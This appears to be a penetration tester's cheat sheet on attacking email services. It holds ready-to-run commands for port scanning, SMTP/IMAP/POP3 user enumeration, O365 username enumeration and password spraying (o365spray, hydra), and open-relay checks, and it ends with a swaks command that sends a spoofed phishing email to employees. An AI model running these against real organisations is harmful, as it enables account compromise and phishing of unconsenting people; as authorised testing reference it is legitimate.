✉️Email

Enumeration

Much harder as we may need to enumerate multiple servers and ports, many companies have their email services in the cloud too.

The most common ports are as follows:

• 25 - SMTP

• 143 - IMAP4

• 110 - POP3

• 465 - SMTP Encrypted

• 587 - SMTP Encrypted/STARTTLS

• 993 - IMPA4 Encrypted

• 995 - POP3 Encrypted

Basic scan

sudo nmap -Pn -sVC -p25,143,110,465,587,993,995 IP

The MX record specifies the mail server responsible for accepting all email messages on behalf of the domain.

We can use the Mail eXchanger (MX) DNS record to identify a mail server.

Host MX Records

host -t MX domain

Host A Records

host -t A mail.domain

DIG MX

dig mx domain | grep "MX" | grep -v ";"

Misconfiguration

If misconfigured then the service may allow anonymous authentication or support methods to enumerate valid users.

Authentication

Simple Mail Transport Protocol (SMTP)

Using command like VRFY,EXPN and RCPT TO we can try an enumerate username. Once found we can password spray, guess or try to brute force passwords.

• VRFY The request asks the server to verify an email,

• EXPN Asks the server for the membership of a mailing list

• RCPT TO Identifies the recipient of the email message

IMAP/POP3

We can enumerate users with the USER command followed by a username, if we receive an OK then the user exists on the server.

User Enumeration

To automate the process of enumeration we can use smtp-user-enumtool

# example - smtp-user-enum -M SMTP-CMD -U users.txt -D domain -t IP
smtp-user-enum -M RCPT -U users.txt -D domain -t IP

Cloud Enumeration

O365 Spray

A username and password enumeration tool that is aimed at Microsoft Office 365.

GitHub - 0xZDH/o365spray: Username enumeration and password spraying tool aimed at Microsoft O365.GitHub

Check if the domain is valid

python3 o365spray.py --validate --domain domain 

Identify Usernames

python3 o365spray.py --enum -U users.txt --domain domain 

Password Attacks

POP3 password spray

hydra -L users.txt -p 'password' -f IP pop3

O365 Spray

python3 o365spray.py --spray -U usersfound.txt -p 'Password1' --count 1 --lockout 1 --domain domain 

Open Relay Attacks

An open relay is an SMTP server which is misconfigured and allows unauthenticated email relay. This masks the source of the message and makes it so the mail originated from the open relay server.

In theory, we could abuse this for phishing emails by spoofing someone else's email address.

Identify if the SMTP port allows an open relay

nmap -p25 -Pn --script smtp-open-relay IP

We can now use a mail client to connect to the mail server and send our email

swaks --from notifications@domain --to employees@domain --header 'Subject: Company Notification' \
--body 'Hi All, we want to hear from you! Please complete the following survey. http://mycustomphishinglink.com/' \
--server IP